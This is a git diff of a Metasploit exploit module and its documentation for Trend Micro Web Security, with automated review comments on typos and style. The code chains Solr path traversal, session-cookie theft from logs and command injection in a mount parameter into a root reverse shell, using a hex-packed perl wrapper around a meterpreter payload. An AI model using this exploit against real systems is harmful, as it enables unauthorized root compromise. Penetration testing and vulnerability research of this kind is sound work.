diff --git a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md
index fa23cc93ec..f277aed746 100644
--- a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md
+++ b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md
@@ -7,22 +7,22 @@ The specific flaw exists within the `LogSettingHandler` class of administrator i
 parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability.
-Another specific flaw exists within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this
+Another specific flaw exists within the proxy service, which listens on port `8080` by default. Unauthenticated users can exploit this
 vulnerability to communicate with internal services in the product.
-Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file
+Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the `file`
 parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this
-vulnerability to disclose information in the context of IWSS user.
+vulnerability to disclose information in the context of the `IWSS` user.
-Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
+Due to a combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the `root` user.
-Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
+Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
-**Vulnerable Application Installation Steps**
+### Vulnerable Application Installation Steps
 Trend Micro Web Security is distrubed as an ISO image by Trend Micro.
-Following steps are valid on the CentOS 6 x64 bit operating system.
+The following steps are valid on the CentOS 6 x64 bit operating system.
 1. 
Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
 2. Find "InterScan Web Security Virtual Appliance" and click.
@@ -37,7 +37,7 @@ Following steps are valid on the CentOS 6 x64 bit operating system.
 - 8 GB of memory at least.
 - 60 GB of disk size at least.
-**Why Perl wrapper for python stager?**
+### Why perl wrapper for python stager?
 Within the exploit function, you can see a custom Perl wrapper usage for python stager payload. The parameter that contains our payload is going through escaping (double quotes, backslash, etc) and blacklist checks on the server-side. Most of the cmd payload will not work under
@@ -63,13 +63,13 @@ contain any special characters.
 5. Run `check`
 6. **Verify** that you are seeing `The target is vulnerable.`
 7. Run `exploit`
-8. **Verify** that you are seeing `Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858` in console.
+8. You should get a root shell
 ## Options
 ## Scenarios
-This module has been tested against Trend Micro Web Security 6.5-SP2_Build_Linux_1852.
+### Trend Micro Web Security 6.5-SP2_Build_Linux_1852
 ```
 msf5 > use exploit/linux/http/trendmicro_websecurity_exec
diff --git a/modules/exploits/linux/http/trendmicro_websecurity_exec.rb b/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
index fb1abd83cf..b4b35e5472 100644
--- a/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
+++ b/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
@@ -8,12 +8,12 @@ class MetasploitModule < Msf::Exploit::Remote
 include Msf::Exploit::Remote::HttpClient
- def initialize(info={})
+ def initialize(info = {})
 super(
 update_info(
 info,
- 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
- 'Description' => %q{
+ 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
+ 'Description' => %q{
 This module exploits multiple vulnerabilities together in order to achive a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user.
@@ -27,18 +27,18 @@ class MetasploitModule < Msf::Exploit::Remote
 Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
- An attacker can leverage this vulnerability to disclose information in the context of IWSS user.
+ An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.
 Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user. Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
 },
- 'License' => MSF_LICENSE,
- 'Author' =>
+ 'License' => MSF_LICENSE,
+ 'Author' =>
 [
 'Mehmet Ince ' # discovery & msf module
 ],
- 'References' =>
+ 'References' =>
 [
 ['CVE', '2020-8604'],
 ['CVE', '2020-8605'],
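Review bot: The reworded Description lines in this hunk and in `@@ -27` leave the module's own typos in place: `achive` in the first description sentence, and `Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.` in the -27 context, while the documentation file in this same commit already corrects the latter to `Versions prior to ...`. Since the commit is already touching the description block, change `achive` to `achieve` and that sentence to `Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.` so the module text matches its doc. The `initialize` body continues past the end of both hunks.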
@@ -47,25 +47,25 @@ class MetasploitModule < Msf::Exploit::Remote
 ['ZDI', '20-677'],
 ['ZDI', '20-678']
 ],
- 'Privileged' => true,
+ 'Privileged' => true,
 'DefaultOptions' => {
 'SSL' => true,
 'payload' => 'python/meterpreter/reverse_tcp',
- 'WfsDelay' => 30
+ 'WfsDelay' => 30
 },
- 'Payload' =>
+ 'Payload' =>
 {
- 'Compat' =>
+ 'Compat' =>
 {
 'ConnectionType' => '-bind'
 }
 },
- 'Platform' => ['python'],
- 'Arch' => ARCH_PYTHON,
- 'Targets' => [ ['Automatic', {}] ],
+ 'Platform' => ['python'],
+ 'Arch' => ARCH_PYTHON,
+ 'Targets' => [ ['Automatic', {}] ],
 'DisclosureDate' => '2020-06-10',
- 'DefaultTarget' => 0,
+ 'DefaultTarget' => 0,
 'Notes' => {
 'Stability' => [CRASH_SAFE],
@@ -92,19 +92,19 @@ class MetasploitModule < Msf::Exploit::Remote
 port_restore = datastore['RPORT']
 datastore['RPORT'] = datastore['PROXY_PORT']
- @jsessionid = ""
+ @jsessionid = ''
 # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file
 print_status('Trying to extract session ID by exploiting reverse proxy service')
 res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
- 'vars_get' => {
- 'command' => 'filecontent',
- 'wt' => 'filestream',
- 'generation' => 1,
- 'file' => "../"*7 << "var/iwss/tomcat/logs/catalina.out",
+ 'method' => 'GET',
+ 'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
+ 'vars_get' => {
+ 'command' => 'filecontent',
+ 'wt' => 'filestream',
+ 'generation' => 1,
+ 'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'
 }
 })
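Review bot: The request in `@@ -92` reaches the proxy port by overwriting `datastore['RPORT']` (and, judging by the `ssl_restore` name used in `@@ -132`, presumably `datastore['SSL']` too) and relying on later code to put them back, so any exception from `send_request_cgi` or the early `return` that precedes the restore in `@@ -132` leaves the module's datastore pointing at `PROXY_PORT` for the rest of the session. As far as I recall the HttpClient mixin honours per-request overrides, so passing `'rport' => datastore['PROXY_PORT']` and `'ssl' => false` inside the `send_request_cgi` hash would avoid mutating the datastore at all; if the mutation has to stay, wrap the request and the restore in `begin`/`ensure`. The enclosing method starts before this hunk.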
@@ -132,20 +132,20 @@ class MetasploitModule < Msf::Exploit::Remote
 return
 end
- print_good("Extracted number of JSESSIONID : #{cookies.length}")
+ print_good("Extracted number of JSESSIONID: #{cookies.length}")
 # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.
 datastore['SSL'] = true if ssl_restore
 datastore['RPORT'] = port_restore
 # Latest cookie in the log file is the one most probably active. So that we use reverse on array.
- cookies.reverse.each_with_index do |cookie, index|
+ cookies.reverse.each_with_index do |cookie, index|
 print_status("Testing JSESSIONID ##{index} : #{cookie}")
 # This endpoints is basically check session :)
 res = send_request_cgi({
 'method' => 'GET',
- 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
+ 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
 'cookie' => "JSESSIONID=#{cookie}"
 })
@@ -156,12 +156,12 @@ class MetasploitModule < Msf::Exploit::Remote
 # If the cookie is active !
 if res.code == 200 && res.body.include?('session_flag')
- print_good("Awesome !!! JESSIONID ##{index} is active.")
+ print_good("Awesome!!! JESSIONID ##{index} is active.")
 @jsessionid = cookie
 break
 end
- print_warning("JSESSIONID ##{index} is inactive ! Moving to the next one.")
+ print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
 end
 if @jsessionid.empty?
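Review bot: The success message rewritten in `@@ -156` still reads `JESSIONID`, the one place the module misspells the cookie name, which will mislead anyone grepping console output against the other `JSESSIONID` messages; make it `print_good("Awesome!!! JSESSIONID ##{index} is active.")`. While the messages are being tidied, the context comments in `@@ -132` carry `adminsitrator` and `This endpoints is basically check session :)`, which could read `# Switch back to the administrator interface port instead of the proxy service; restore the rport and ssl values.` and `# This endpoint reports whether the session is still valid.` The `each_with_index` block closes inside `@@ -156`, but the surrounding method starts before `@@ -132` and ends after it.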
@@ -217,20 +217,20 @@ class MetasploitModule < Msf::Exploit::Remote
 # For that reason, I am planting our payload dropper within the perl command.
 cmd = "python -c \"#{payload.encoded}\""
- final_payload = cmd.to_s.unpack("H*").first
+ final_payload = cmd.to_s.unpack1('H*')
 p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
 vars_post = {
- mount_device: "mount $(#{p}) /var/offload",
- cmd: 'mount'
+ mount_device: "mount $(#{p}) /var/offload",
+ cmd: 'mount'
 }
 send_request_cgi({
 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
+ 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
 'cookie' => "JSESSIONID=#{@jsessionid}",
- 'ctype' => 'application/json',
- 'data' => vars_post.to_json
+ 'ctype' => 'application/json',
+ 'data' => vars_post.to_json
 })
 end
 end
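Review bot: The local `p` kept in this hunk (`p = "perl -e 'system(pack(...))'"`) shadows `Kernel#p`, so a debugging `p` placed anywhere below it in the method silently becomes a reference to the string instead of a print; a descriptive name such as `perl_wrapper` removes the trap and says what the string is, with the interpolation becoming `mount_device: "mount $(#{perl_wrapper}) /var/offload"`. On the changed line, `cmd` is already a String built by interpolation, so `cmd.to_s.unpack1('H*')` can simply be `cmd.unpack1('H*')`. The method's beginning lies before the hunk; its `end` and the class's `end` are the hunk's last two lines.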